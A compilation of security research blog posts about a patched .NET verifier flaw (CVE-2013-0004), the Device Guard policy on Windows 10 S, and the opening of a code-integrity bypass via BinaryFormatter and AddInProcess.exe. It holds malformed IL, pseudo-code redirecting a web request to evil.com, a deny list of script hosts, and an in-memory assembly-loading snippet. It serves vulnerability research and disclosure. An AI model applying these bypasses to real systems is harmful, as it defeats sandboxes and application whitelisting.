
Old .NET Vulnerability #4: Double Construction Verification Issue (CVE-2013-0004)

This blog post is a continuation of my series on old .NET vulnerabilities. It's been a while since I did #2 and #3. It concerns a bug in the IL verifier which allows an object's constructor to be called twice, leading to TOCTOU attacks and other weird behaviours from Partial Trust (PT) sandboxed code. It was fixed in MS13-004 as CVE-2013-0004.

IL Verification and Partial Trust

If you've ever dealt with partial trust .NET applications you might know about the IL verifier. Even though .NET is effectively type safe, it's possible to write bad IL code (for example, code which calls a method on the wrong type of object). The framework has a verifier which will scan the IL of a method it's going to JIT and ensure that it meets a number of requirements so that type safety can be enforced. This has a performance impact, so MS decided to only apply it when emitting code for a PT assembly. If you're running in full trust then you can just invoke unsafe code or call through P/Invoke, so doing additional verification doesn't seem worth the effort.

From an EoP perspective, testing the boundaries of the IL verifier is important: if you can sneak something past the verifier you might be able to create unsafe code which can be exploited to break out of the PT sandbox. For whatever reason, one day I decided to look at the handling of object constructors. Even though constructors are pretty much like methods (except they're marked with the special name .ctor), they have special rules as stated in ECMA-335:
  • CLS Rule 21: An object constructor shall call some instance constructor of its base class before any access occurs to inherited instance data. (This does not apply to value types, which need not have constructors.)
  • CLS Rule 22: An object constructor shall not be called except as part of the creation of an object, and an object shall not be initialized twice.
Of course these are Common Language Specification rules which just ensure interoperability; they don't necessarily translate into a list of rules for the verifier. But you'd kind of assume they would match up. However, looking further in §1.8.1.4 we find the following when referring to the verification of "Class and object initialization rules":

"An object constructor shall not return unless a constructor for the base class or a different constructor for the object's class has been called on the newly constructed object. The verification algorithm shall treat the this pointer as uninitialized unless the base class constructor has been called. No operations can be performed on an uninitialized this except for storing into and loading from the object's fields."

This snippet doesn't mention anything about double initialization. Perhaps there's a bug here, let's test this out.

Testing the Double Construction Verification Error

C# doesn't allow us to easily create malformed IL code. We could use the System.Reflection.Emit classes to generate the malformed IL code on the fly, but I find it quicker to use the IL assembler which ships with the .NET framework.
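
For illustration, a rough sketch of what the Reflection.Emit route might look like; all names here are my own, and the point is just that you control each emitted instruction, so nothing stops you omitting or duplicating the base constructor call:

using System;
using System.Reflection;
using System.Reflection.Emit;

// Sketch (illustrative names): emit a constructor by hand.
var asm = AppDomain.CurrentDomain.DefineDynamicAssembly(
    new AssemblyName("TestAsm"), AssemblyBuilderAccess.Run);
var mod = asm.DefineDynamicModule("TestMod");
var type = mod.DefineType("B", TypeAttributes.Public, typeof(object));
var ctor = type.DefineConstructor(MethodAttributes.Public,
    CallingConventions.Standard, Type.EmptyTypes);
ILGenerator il = ctor.GetILGenerator();
il.Emit(OpCodes.Ldarg_0);
il.Emit(OpCodes.Call, typeof(object).GetConstructor(Type.EmptyTypes));
// Repeating the two instructions above would produce a double construction.
il.Emit(OpCodes.Ret);
type.CreateType();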

Let's first create two classes in C# and compile it to an assembly using Visual Studio or the command line CSC compiler:

using System;

class A {
    private int _x;

    protected A(int x) {
        _x = x;
    }

    public override string ToString() {
        return String.Format("x={0}", _x);
    }
}

class B : A {
    public B() : base(1234) {
        Console.WriteLine(this);
    }
}

class MainClass {
    static void Main() {
        new B();
    }
}

We have two classes, A and B. B is derived from A and calls the base constructor, passing the value 1234. We then write the this object to the console, which calls ToString. Running this on its own results in writing x=1234 to the console. So far no surprises. Now let's disassemble the assembly; I'd recommend the ILDasm tool which comes with the .NET SDK for this, as it generates IL code which is easily assembled again. Run the command "ildasm /OUT=output.il program.exe", replacing "program.exe" with the name of the compiled C# program. We can now pick out the IL code for the B class as shown:

.class private auto ansi beforefieldinit B
       extends A
{
  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    // Code size       18 (0x12)
    .maxstack  8
    IL_0000:  ldarg.0
    IL_0001:  ldc.i4     0x4d2
    IL_0006:  call       instance void A::.ctor(int32)
    IL_000b:  ldarg.0
    IL_000c:  call       void [mscorlib]System.Console::WriteLine(object)
    IL_0011:  ret
  } // end of method B::.ctor

} // end of class B


The call to the base constructor is the first three instructions. First the this pointer is pushed onto the evaluation stack with the ldarg.0 instruction. The ldarg instruction pushes the numbered argument to the current function onto the stack, and as in C++ the this argument is a hidden first argument to the function. We then push the constant 0x4D2, or 1234, onto the evaluation stack and call the instance constructor for A which takes a single 32 bit integer. Let's see what happens if we just don't call the base constructor. For that, remove the first 3 instructions of the constructor; either delete them or just comment them out. Now run the IL assembler to recreate the program using the command "ilasm.exe /OUTPUT=program_no_base.exe output.il". Run the created executable and be prepared to be shocked when nothing really happens, other than instead of printing "x=1234" we get "x=0". Ultimately the runtime is still mostly type safe; sure, you've not called the base constructor, but the normal object creation routines did ensure that the _x field was initialized to 0.

As nothing happened, perhaps this will work in PT. First things first, let's run the verifier on the assembly to see what the CLR thinks about the missing call to the base constructor. The SDK comes with a tool, PEVerify, which will verify the assembly passed to it and report any verification failures.

C:\> peverify program_no_base.exe

Microsoft (R) .NET Framework PE Verifier.  Version  4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

[IL]: Error: [program_no_base.exe : B::.ctor][offset 0x00000001][found ref ('this' ptr) 'B'][expected ref 'System.Object'] Unexpected type on the stack.
[IL]: Error: [program_no_base.exe : B::.ctor][offset 0x00000006] Return from .ctor when this is uninitialized.
2 Error(s) Verifying program_no_base.exe

The verifier actually reports two errors. The first error is reported after pushing the this pointer on the stack to pass to System.Console.WriteLine. This error represents the check to ensure that the this pointer isn't used uninitialized. The verifier maintains a state for the this pointer: initially it's uninitialized, but after the this pointer is passed to a constructor the type changes to the appropriate type for the class. The second error checks that a constructor is called prior to returning from the constructor. But does it fail if we run it in PT? To test that we can run this code in an XBAP or a restricted ClickOnce application. I just have a simple test harness which runs the code inside a limited sandbox. If you execute the code as PT you immediately see the following exception:

Unhandled Exception: System.Security.VerificationException: Operation could destabilize the runtime.
   at B..ctor()
   at MainClass.Main()

VerificationException is where dreams of sandbox escapes go to die. At least the verifier is consistent, and there's a good reason for that. The verifier used in PEVerify is not an isolated copy of the verification rules used in the framework. The tool accesses a COM interface from the runtime (ICLRValidator if you're interested), so what PEVerify outputs as errors should match what the runtime actually uses. What about double initialization? Replace the constructor in B with the following and reassemble again:

  .method public hidebysig specialname rtspecialname 
          instance void  .ctor() cil managed
  {
    .maxstack  8
    ldarg.0
    ldc.i4     0x4d2
    call       instance void A::.ctor(int32)
    ldarg.0
    call       void [mscorlib]System.Console::WriteLine(object)
    ldarg.0
    ldc.i4     42
    call       instance void A::.ctor(int32)
    ldarg.0
    call       void [mscorlib]System.Console::WriteLine(object)
    ret
  } // end of method B::.ctor

This replacement constructor just repeats the call to the constructor and the call to WriteLine, but replaces the number with 42 when initializing the internal field the second time. Running this with full trust will print "x=1234" followed by "x=42" as you might expect. However, running this in PT mode gives the same result, as long as you're running an old version of .NET 2 or 4 prior to the MS13-004 patch. Running PEVerify shows what we suspected: the double construction isn't detected:

Microsoft (R) .NET Framework PE Verifier.  Version  4.0.30319.0
Copyright (c) Microsoft Corporation.  All rights reserved.

All Classes and Methods in program_double_con.exe Verified.

The patch for MS13-004 just added a verification rule to detect this condition. If you now run PEVerify on the binary with an up to date version of .NET you'll see the following verification error.

[IL]: Error: [program_double_con.exe : B::.ctor][offset 0x00000017] Init state for this differs depending on path.
1 Error(s) Verifying program_double_con.exe

As I mentioned, because PEVerify uses the runtime's verifier we didn't need to update the tool, just the runtime, to detect the new error. To wrap up, let's see an example of a use case for this issue to elevate privileges.

Example Use Case

One of the simplest ways of abusing this feature is performing a TOCTOU attack on system class library code which assumes an object is immutable because you can't construct it twice. A good example of a class which implements this pattern is the System.Uri class. The Uri class has no methods to change its contents outside of the constructor, so it's effectively immutable. However, with the ability to call a constructor twice we can change the target the class represents without changing the object reference. This means that if we can get some system code to first check the Uri object is safe, then store the verified Uri object reference to use later, we can change the target and circumvent a security check.

A perfect example of this is the System.Net.WebRequest class. The class has a Create method which takes a Uri object. If we pass an HTTP URI we end up in the HttpWebRequest internal class constructor, which has the following code (heavily edited to remove unnecessary initialization):

internal HttpWebRequest(Uri uri) {
    new WebPermission(NetworkAccess.Connect, uri).Demand();
    this._Uri = uri;
    // Just initialize the rest.
}

The code first demands that the caller has NetworkAccess.Connect permission to the target URI. If that succeeds then it stores the Uri object for later use. The created HttpWebRequest object never checks the Uri again and it's used directly when we eventually call the GetResponse method. 

For this to work you at least need a WebPermission grant in the PT sandbox you're trying to exploit. Fortunately, if you deployed this through an XBAP you'd be granted permission to communicate back to the source web site, and at the time you could even load the XBAP without a prompt (what a world). So assuming you deploy the application from http://www.safe.com and you want to communicate with http://www.evil.com, the following pseudo C# will do that for you:

class MyUri : Uri {
    public MyUri() {
        base("http://www.safe.com");
        // Create web request while we're safe.
        WebRequest request = WebRequest.Create(this);
        base("http://www.evil.com");
        // Use request to talk to http://evil.com
    }
}

We construct a derived Uri class (even though Uri is immutable, it can still be derived from). Then in the constructor we call the base constructor with the safe URI we've got permission to communicate with. At this point the this pointer is valid according to the verifier. We can now pass the this pointer to the WebRequest creation call; it'll do the check, but it's allowed. Finally, we re-call the constructor to change the underlying URI to the different location. When we get the response from the WebRequest we'll communicate with http://www.evil.com instead.

You still need to convert this into an actual implementation; you can't compile it from that pseudo C#. But I'll leave that as an exercise for the reader.

Device Guard on Windows 10 S

This blog is about Device Guard (DG) on Windows 10 S (Win10S). I’ll go through extracting the policy and finding out what you can and cannot run on a default Win10S system. Perhaps in a future blog post, I’ll describe some ways of getting arbitrary code execution without installing any additional software such as Office or upgrading to Windows 10 Pro.

Win10S is the first Windows operating system released to consumers which comes pre-locked down with DG. DG builds upon Kernel Mode Code Integrity (KMCI), introduced in Windows Vista, and User Mode Code Integrity (UMCI), which was introduced in Windows 8 RT. It contains many features to restrict code execution by limiting what types of executable files/scripts, including DLLs, can be loaded based on a set of policy rules. A good first step towards trying to find ways to run arbitrary code on a system with DG is to extract the DG policy and inspect it for weaknesses.

Before we start, I'd like to thank Matt Graeber for reviewing this post before it went out. His DG knowledge is far better than anyone I know.

Extracting the DG System Integrity Policy

The enforcement of DG is configured through a System Integrity (SI) policy. The SI policy is stored as a binary file on disk. When the operating system boots either WINLOAD or the kernel CI driver loads the policy into memory and begins enforcement based on the various rules configured.

The location of the file varies depending on how the policy was deployed. On the Surface Laptop I have, which comes with Win10S pre-installed, the policy is located inside the C:\Windows\Boot\EFI folder with the name winsipolicy.p7b. There are no restrictions on reading this file to extract its contents and determine what policy is enforced. Unfortunately, there's no official documentation I know of which describes the binary policy file format. There is the ConfigCI PowerShell module which will convert an XML file to a binary policy. Unfortunately, there's no corresponding command to perform the reverse.

Fortunately, the ever amazing Matt Graeber put in the effort and wrote a PowerShell script which can convert the binary format back to the XML format. Unfortunately, there were some issues with the original script, such as missing some new additions to the format that Microsoft have added, as well as a couple of bugs. Therefore, I've tweaked the original to fully support the policy format used on Win10S as well as fixing some bugs. Matt updated his copy on GitHub with my fixes; you can get it from here. Load the script into PowerShell then run the following command:

ConvertTo-CIPolicy winsipolicy.p7b output.xml

The result of the conversion is an XML file we can read. As with the binary file, the XML format is poorly documented; the best resource is almost certainly Matt Graeber's blog, specifically this post. Let's break it down into small sections.

System Integrity Policy Rules

The first important section is the Rules, which define a set of boolean options to enable in the System Integrity policy.

<Rules>
 <Rule>
   <Option>Enabled:UMCI</Option>
 </Rule>
 <Rule>
   <Option>Enabled:Advanced Boot Options Menu</Option>
 </Rule>
 <Rule>
   <Option>Required:Enforce Store Applications</Option>
 </Rule>
 <Rule>
   <Option>Enabled:Conditional Windows Lockdown Policy</Option>
 </Rule>
</Rules>

The first option enables UMCI. By default, DG doesn't enforce UMCI, although it does enforce KMCI. The second option enables the Advanced Boot Options Menu; this is interesting, as by default the menu would be disabled, and this policy allows the user of the system to have more control over the boot process. This configuration will become important in a later blog post. The third option enforces Store Applications. This ensures you can't disable UMCI for store applications. Without this setting, it'd be possible to configure a side-loading policy to allow you to deploy your own UWP applications. As the purpose of Win10S is "security," they only allow UWP applications which are store signed; I'll explain what that means in the section on allowed signers. Finally, Conditional Windows Lockdown Policy seems to be related to the Windows 10 S SKU and the potential that the lockdown policy can ultimately be disabled. This is related to license values and a system environment variable "Kernel_CI_SKU_UNLOCKED". This probably needs further investigation.

File Rules

Next up is the set of file rules. These are usually used to blacklist specific executable files which are known DG bypasses and would allow you to trivially run arbitrary code. This is close to the same list provided by Microsoft in their DG deployment guide here. However, they also block things like registry editing tools and Windows Scripting Host.

<FileRules>
 <Deny FileName="bash.exe" MinimumFileVersion="65535.65535.65535.65535"/>
 <Deny FileName="CDB.Exe" MinimumFileVersion="..."/>
 <Deny FileName="cmd.Exe" MinimumFileVersion="..."/>
 <Deny FileName="cscript.exe" MinimumFileVersion="..."/>
 <Deny FileName="csi.Exe" MinimumFileVersion="..."/>
 <Deny FileName="dnx.Exe" MinimumFileVersion="..."/>
 <Deny FileName="fsi.exe" MinimumFileVersion="..."/>
 <Deny FileName="kd.Exe" MinimumFileVersion="..."/>
 <Deny FileName="MSBuild.Exe" MinimumFileVersion="..."/>
 <Deny FileName="mshta.exe" MinimumFileVersion="..."/>
 <Deny FileName="ntsd.Exe" MinimumFileVersion="..."/>
 <Deny FileName="powershell.exe" MinimumFileVersion="..."/>
 <Deny FileName="powershell_ise.exe" MinimumFileVersion="..."/>
 <Deny FileName="rcsi.Exe" MinimumFileVersion="..."/>
 <Deny FileName="reg.exe" MinimumFileVersion="..."/>
 <Deny FileName="regedit.exe" MinimumFileVersion="..."/>
 <Deny FileName="regedt32.exe" MinimumFileVersion="..."/>
 <Deny FileName="wbemtest.exe" MinimumFileVersion="..."/>
 <Deny FileName="windbg.Exe" MinimumFileVersion="..."/>
 <Deny FileName="wmic.exe" MinimumFileVersion="..."/>
 <Deny FileName="wscript.exe" MinimumFileVersion="..."/>
</FileRules>

For each deny rule, the policy specifies a filename and a minimum file version. Note that the minimum version is really the maximum when it comes to a deny rule, in the sense that the rule only applies to files with a version number less than that specified. As every rule has the version set to 65535.65535.65535.65535, which is the absolute maximum, it ensures that no version of these executables can ever execute. The filename and version are extracted from the executable's version resources, which means you can't just rename cmd.exe to badger.exe: the policy will see the Original Filename inside the version resource and block execution. If you try and modify the version resource then the file's signature no longer matches and you won't pass the signing policy.
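
As a quick illustration of why renaming doesn't help, the version resource travels with the file; a short sketch (the renamed path is hypothetical):

using System;
using System.Diagnostics;

// Sketch: a renamed copy of cmd.exe still reports its original name from
// the version resource, which is what the policy matches on.
var info = FileVersionInfo.GetVersionInfo(@"C:\test\badger.exe");
// Prints "Cmd.Exe" plus the version despite the rename.
Console.WriteLine("{0} {1}", info.OriginalFilename, info.FileVersion);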

It's not really clear why Microsoft went all out and blocked things like CMD, other than to annoy users. Sure, you could use it to run commands, but you're still somewhat limited by what executables you can run based on the signing policy. PowerShell and WScript I can perhaps understand more, but as we'll see later, these file policy rules only serve as a speed bump to prevent us getting arbitrary code execution.

Allowed Signers

Now we get on to what signers the DG policy will allow (assuming of course they're not blocked by the file rules). First, the DG policy defines the list of allowed signers; this list is then referred to later in the policy configuration. The list of allowed signers is as follows:
<Signer Name="MincryptKnownRootMicrosoftTestRoot2010" ID="ID_SIGNER_TEST2010">
 <CertRoot Type="Wellknown" Value="0A"/>
</Signer>
<Signer Name="MincryptKnownRootMicrosoftDMDRoot2005" ID="ID_SIGNER_DRM">
 <CertRoot Type="Wellknown" Value="0C"/>
</Signer>
<Signer Name="MincryptKnownRootMicrosoftProductRoot2010" ID="ID_SIGNER_DCODEGEN">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_DCODEGEN"/>
</Signer>
<Signer Name="MincryptKnownRootMicrosoftStandardRoot2011" ID="ID_SIGNER_AM">
 <CertRoot Type="Wellknown" Value="07"/>
 <CertEKU ID="ID_EKU_AM"/>
</Signer>
<Signer Name="Microsoft Product Root 2010 Windows EKU" ID="ID_SIGNER_WINDOWS_PRODUCTION_USER">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_WINDOWS"/>
</Signer>
<Signer Name="Microsoft Product Root 2011 Windows EKU" ID="ID_SIGNER_WINDOWS_PRODUCTION_USER_2011">
 <CertRoot Type="TBS" Value="4E80BE107C860DE896384B3EFF50504DC2D76AC7151DF3102A4450637A032146"/>
 <CertEKU ID="ID_EKU_WINDOWS"/>
</Signer>
<Signer Name="Microsoft Product Root 2010 ELAM EKU" ID="ID_SIGNER_ELAM_PRODUCTION_USER">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_ELAM"/>
</Signer>
<Signer Name="Microsoft Product Root 2010 HAL EKU" ID="ID_SIGNER_HAL_PRODUCTION_USER">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_HAL_EXT"/>
</Signer>
<Signer Name="Microsoft Product Root 2010 WHQL EKU" ID="ID_SIGNER_WHQL_SHA2_USER">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_WHQL"/>
</Signer>
<Signer Name="Microsoft Product Root WHQL EKU SHA1" ID="ID_SIGNER_WHQL_SHA1">
 <CertRoot Type="Wellknown" Value="05"/>
 <CertEKU ID="ID_EKU_WHQL"/>
</Signer>
<Signer Name="Microsoft Product Root WHQL EKU MD5" ID="ID_SIGNER_WHQL_MD5">
 <CertRoot Type="Wellknown" Value="04"/>
 <CertEKU ID="ID_EKU_WHQL"/>
</Signer>
<Signer Name="Microsoft Flighting Root 2014 Windows EKU" ID="ID_SIGNER_WINDOWS_FLIGHT_ROOT">
 <CertRoot Type="Wellknown" Value="0E"/>
 <CertEKU ID="ID_EKU_WINDOWS"/>
</Signer>
<Signer Name="Microsoft Flighting Root 2014 ELAM EKU" ID="ID_SIGNER_ELAM_FLIGHT">
 <CertRoot Type="Wellknown" Value="0E"/>
 <CertEKU ID="ID_EKU_ELAM"/>
</Signer>
<Signer Name="Microsoft Flighting Root 2014 HAL EKU" ID="ID_SIGNER_HAL_FLIGHT">
 <CertRoot Type="Wellknown" Value="0E"/>
 <CertEKU ID="ID_EKU_HAL_EXT"/>
</Signer>
<Signer Name="Microsoft Flighting Root 2014 WHQL EKU" ID="ID_SIGNER_WHQL_FLIGHT_SHA2">
 <CertRoot Type="Wellknown" Value="0E"/>
 <CertEKU ID="ID_EKU_WHQL"/>
</Signer>
<Signer Name="Microsoft MarketPlace PCA 2011" ID="ID_SIGNER_STORE">
 <CertRoot Type="TBS" Value="FC9EDE3DCCA09186B2D3BF9B738A2050CB1A554DA2DCADB55F3F72EE17721378"/>
 <CertEKU ID="ID_EKU_STORE"/>
</Signer>
<Signer Name="Microsoft Product Root 2010 RT EKU" ID="ID_SIGNER_RT_PRODUCTION">
 <CertRoot Type="Wellknown" Value="06"/>
 <CertEKU ID="ID_EKU_RT_EXT"/>
</Signer>
<Signer Name="Microsoft Flighting Root 2014 RT EKU" ID="ID_SIGNER_RT_FLIGHT">
 <CertRoot Type="Wellknown" Value="0E"/>
 <CertEKU ID="ID_EKU_RT_EXT"/>
</Signer>
<Signer Name="Microsoft Standard Root 2001 RT EUK" ID="ID_SIGNER_RT_STANDARD">
 <CertRoot Type="Wellknown" Value="07"/>
 <CertEKU ID="ID_EKU_RT_EXT"/>
</Signer>

The majority of the signing certificates use a special "Wellknown" format with just a single numeric value which identifies the certificate. Finding out what certificates these correspond to can be tricky; again, poor documentation. Fortunately, the PowerShell ConfigCI module on Win10S has example policy files such as Default_WindowsEnforced.xml which at least give them names, if not spelling out the explicit certificate used (there could be multiple Microsoft Product Root 2010 certificates after all). It's likely, for example, that "Microsoft Product Root 2010" is the following root, which is the root certificate of pretty much all the signed files on Win10S:

[Screenshot: the Microsoft Product Root 2010 root certificate]

However, it's not enough to be signed by a whitelisted signer; that'd be too easy. You must also have a specific Enhanced Key Usage (EKU) in the certificate chain. So, for example, signer ID_SIGNER_WINDOWS_PRODUCTION_USER must have the EKU ID_EKU_WINDOWS, which has the OID value 1.3.6.1.4.1.311.10.3.6. The Windows binaries have this EKU set, but something which is also Microsoft signed, such as WinDBG, is signed by the same root but doesn't have this EKU set, meaning it doesn't load. From this information we can understand what it means to be store signed: it's a combination of a specific certificate chain and a specific Store EKU. This is reflected in the ID_SIGNER_STORE signing rule.

[Screenshot: the EKUs present in a certificate chain]
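
If you want to check this yourself, a sketch along these lines will dump the EKU OIDs from a file's signing certificate (the file path is just an example, and this only inspects the leaf certificate, not the whole chain the policy checks):

using System;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;

// Sketch: dump the EKU OIDs from a signed file's certificate.
var cert = new X509Certificate2(
    X509Certificate.CreateFromSignedFile(@"C:\Windows\System32\ntoskrnl.exe"));
foreach (var ext in cert.Extensions) {
    var eku = ext as X509EnhancedKeyUsageExtension;
    if (eku != null) {
        foreach (Oid oid in eku.EnhancedKeyUsages) {
            // 1.3.6.1.4.1.311.10.3.6 is the Windows EKU described above.
            Console.WriteLine("{0} ({1})", oid.Value, oid.FriendlyName);
        }
    }
}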

For kernel code, the following signers are allowed:

<AllowedSigner SignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_ELAM_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_HAL_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_SHA2_USER"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_SHA1"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_MD5"/>
<AllowedSigner SignerId="ID_SIGNER_WINDOWS_FLIGHT_ROOT"/>
<AllowedSigner SignerId="ID_SIGNER_ELAM_FLIGHT"/>
<AllowedSigner SignerId="ID_SIGNER_HAL_FLIGHT"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_FLIGHT_SHA2"/>
<AllowedSigner SignerId="ID_SIGNER_TEST2010"/>

For user mode, the following are allowed:

<AllowedSigner SignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_ELAM_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_HAL_PRODUCTION_USER"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_SHA2_USER"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_SHA1"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_MD5"/>
<AllowedSigner SignerId="ID_SIGNER_WINDOWS_FLIGHT_ROOT"/>
<AllowedSigner SignerId="ID_SIGNER_ELAM_FLIGHT"/>
<AllowedSigner SignerId="ID_SIGNER_HAL_FLIGHT"/>
<AllowedSigner SignerId="ID_SIGNER_WHQL_FLIGHT_SHA2"/>
<AllowedSigner SignerId="ID_SIGNER_STORE"/>
<AllowedSigner SignerId="ID_SIGNER_RT_PRODUCTION"/>
<AllowedSigner SignerId="ID_SIGNER_DRM"/>
<AllowedSigner SignerId="ID_SIGNER_DCODEGEN"/>
<AllowedSigner SignerId="ID_SIGNER_AM"/>
<AllowedSigner SignerId="ID_SIGNER_RT_FLIGHT"/>
<AllowedSigner SignerId="ID_SIGNER_RT_STANDARD"/>
<AllowedSigner SignerId="ID_SIGNER_TEST2010"/>

The only thing which stands out here is the user mode signing for ID_SIGNER_DRM, which is because it's a pre-trusted root key for DRM. And as I've blogged about before, it's almost certainly possible to get a private key for a certificate which chains to this root from many graphics drivers (see my blog post here). I've not tested it, but while you could chain to this root by grabbing the private key from the kernel driver (assuming it's in software), the chain you could build probably isn't suitable for code signing anyway. But again, it's something worth looking at.

The final use for signers is specifying who's allowed to sign and update the policy. In order for a policy to be used unsigned, the "Enabled:Unsigned System Integrity Policy" option must be set; however, as we saw earlier in this blog, that wasn't the case. You can see which signer is allowed to sign the policy in the following snippet.

<UpdatePolicySigners>
 <UpdatePolicySigner SignerId="ID_SIGNER_WINDOWS_PRODUCTION_USER_2011"/>
</UpdatePolicySigners>

This policy is using ID_SIGNER_WINDOWS_PRODUCTION_USER_2011 which, if you look back at the signers, is a To-Be-Signed (TBS) certificate hash rather than a well known one. So we'd need to find the actual certificate which matches this hash value. However, we can guess: it's almost certainly just one of the certificates used to sign the existing winsipolicy.p7b file. We can use the Get-CIBinaryPolicyCertificate cmdlet from Matt's script to dump the certificates and then use the ConfigCI PowerShell module to generate the TBS value, which we can see matches up with the TBS value from before:

[Screenshot: the dumped policy signing certificate's TBS hash matching the value above]

Conclusions

Overall, from a basic DG policy perspective, Win10S seems reasonable. Effectively, only Microsoft signed code can run, and then only binaries with either WHQL or Windows EKUs in the certificates, which would make it tricky to find anything useful outside of what's installed with the operating system to exploit. Of course, with Desktop Bridge applications, which are effectively store signed Win32 applications, and the general quality of Windows driver developers, no doubt there's some additional code which can be exploited by installing it onto the system. You just have to look at Office, which is allowed to be installed from the Store and which has its VBA macro functionality intact.

What is missing, though, is any use of Hyper-V based enforcement, either to restrict removing the policy or to ensure kernel mode integrity through HyperGuard or HVCI code integrity enforcement. This is a severe weakness. It's not like Win10S doesn't support Hyper-V; you can even install the full Hyper-V and configuration tools. This allows you to run a normal version of Windows in a VM on top of the locked down platform, which is actually kind of nice. But it means that the System Integrity policy is not very well protected. This is something which we'll come back to in a future blog post.

DG on Windows 10 S: Executing Arbitrary Code

From my previous blog post you might assume that getting non-Microsoft code to run on Windows 10 S would be difficult. Of course, it's already been noted that all you need to do is install Office and you can access the full scripting capability of VBA macros, as long as the file does not have the Mark of the Web (MOTW). The fact is that the basic limitation on loading arbitrary executables and DLLs is the only thing being enforced by the Windows kernel. There's nothing stopping existing, signed applications, such as Office, from creating their own executable content which can be abused by the user or indeed an attacker.


You might therefore also assume that it'll be trivial to get some arbitrary code running, as there are a number of different scripting engines on a default installation of Windows? Not so fast: many of the in-built script engines such as PowerShell and Windows Scripting Host (WSH), which runs JScript/VBScript, are "Enlightened". This means that when they detect UMCI is enabled, they'll go into a locked down mode, such as PowerShell's Constrained Language Mode. If the script being executed is signed by the same sets of certificates as binary executable content, these enlightened hosts will unlock the full functionality of the scripting language. Typically, there are ways to bypass these restrictions; in fact, I did just that for Windows RT. You can see an entire presentation about the bypasses from BlueHat (when I was still invited to these things).


But this is somewhat academic when it comes to Win10S. The main enablers for bypasses, scripting engines, have their primary host executables blacklisted in the DG policy I showed last time. A few other well known offenders such as MSBuild are also blacklisted. So I guess we'll have to go back to square one? Well, not so much; there are still a lot of executables on a default Win10S system which can be abused, we just need to find them.


DISCLAIMER: I've not sent the DG/UMCI bypass I'm about to describe to MSRC. The reason for not doing so is that it's not a click-and-run bypass. The only group which is likely to find the bypass useful are (as Matt and Casey would put it) Enlightened attackers: attackers who know how your systems are secured. This could be an external attacker, but it could also be your own users. DO NOT consider any application whitelisting solution to be secure against a bored member of staff.

Give my Regards to BinaryFormatter

Object serialization frameworks are a rich source of trivial arbitrary execution bugs, and .NET clearly didn't want to be left out. Not that long ago, I found an RCE in .NET relating to the handling of WMI classes. You can read more details in the blog post, but to cut a long story short it allowed me to pass an arbitrary byte stream to the in-built BinaryFormatter class and get it to load an Assembly from memory and execute arbitrary code.


What was less obvious was that this was also a DG bypass. PowerShell allows you, in Constrained Language Mode, to query arbitrary WMI servers and classes; however, the .NET runtime isn't enlightened, so it will happily load an Assembly from a byte array. Loading from a byte array is important, as normally .NET will load Assemblies from an executable file which needs to be mapped into memory. The act of mapping the executable into memory triggers the CI module in the kernel to verify the signature, which for arbitrary code isn't going to be permitted due to the configured CI policy. From a byte array, the kernel never sees the Assembly; .NET will process it and execute arbitrary managed code from it. The DCOM bug has now been fixed, and at any rate PowerShell is blocked, so we couldn't invoke the WMI methods. However, if we could find another application which will take an array of bytes and pass it to BinaryFormatter, we could reuse the deserialization exploit chain from my previous exploit and use it to get a DG bypass in memory.
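
To make the core primitive concrete, this is roughly all the managed side needs to do; the payload path and type name are illustrative:

using System;
using System.IO;
using System.Reflection;

// Sketch: loading an assembly from a byte array never maps an image file,
// so the kernel CI policy is never consulted.
byte[] asm_data = File.ReadAllBytes("payload.dll");
Assembly asm = Assembly.Load(asm_data);
// Creating an instance runs the constructor: arbitrary managed code.
object entry = Activator.CreateInstance(asm.GetType("EntryPoint"));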


I concentrated my efforts on just the executables inside the %SystemRoot%\Microsoft.Net directories, as many of them are written in .NET and so stand a reasonable chance of being exploitable. The first one to catch my eye, more than anything from a purely alphabetic point-of-view, was AddInProcess.exe. This executable is known to me; in fact, I've looked at it before from the perspective of Partial Trust sandbox escapes (maybe I'll blog about that at some point in the future).


The process is used as part of the Add-In model which was introduced in .NET Framework 3.5. The Add-In model provides a structured framework to expose functionality to 3rd parties to add additional features to an existing application. A plugin framework, if you will. Actually implementing this requires you to develop contract interfaces and build pipelines and many other complicated things, but we don't really care about all that. The interesting thing is that the model supports Out-of-Process (OOP) Add-Ins, and this is the purpose of AddInProcess. The executable is started in order to act as a host for these OOP Add-Ins. The Main function of the executable is pretty simple; the following is it in almost its entirety:


static int Main(string[] args) {
    if (args.Length != 2
        || !args[0].StartsWith("/guid:")
        || !args[1].StartsWith("/pid:")) {
        return 1;
    }

    string guid = args[0].Substring(6);
    int pid = int.Parse(args[1].Substring(5));
    AddInServer server = new AddInServer();
    var server_prov = new BinaryServerFormatterSinkProvider {
        TypeFilterLevel = TypeFilterLevel.Full
    };
    var client = new BinaryClientFormatterSinkProvider();
    var props = new Hashtable();
    props["name"] = "ServerChannel";
    props["portName"] = guid;
    props["typeFilterLevel"] = "Full";
    var chnl = new AddInIpcChannel(props, client, server_prov);
    ChannelServices.RegisterChannel(chnl, false);
    RemotingServices.Marshal(server, "AddInServer");
    Process.GetProcessById(pid).WaitForExit();
    return 0;
}


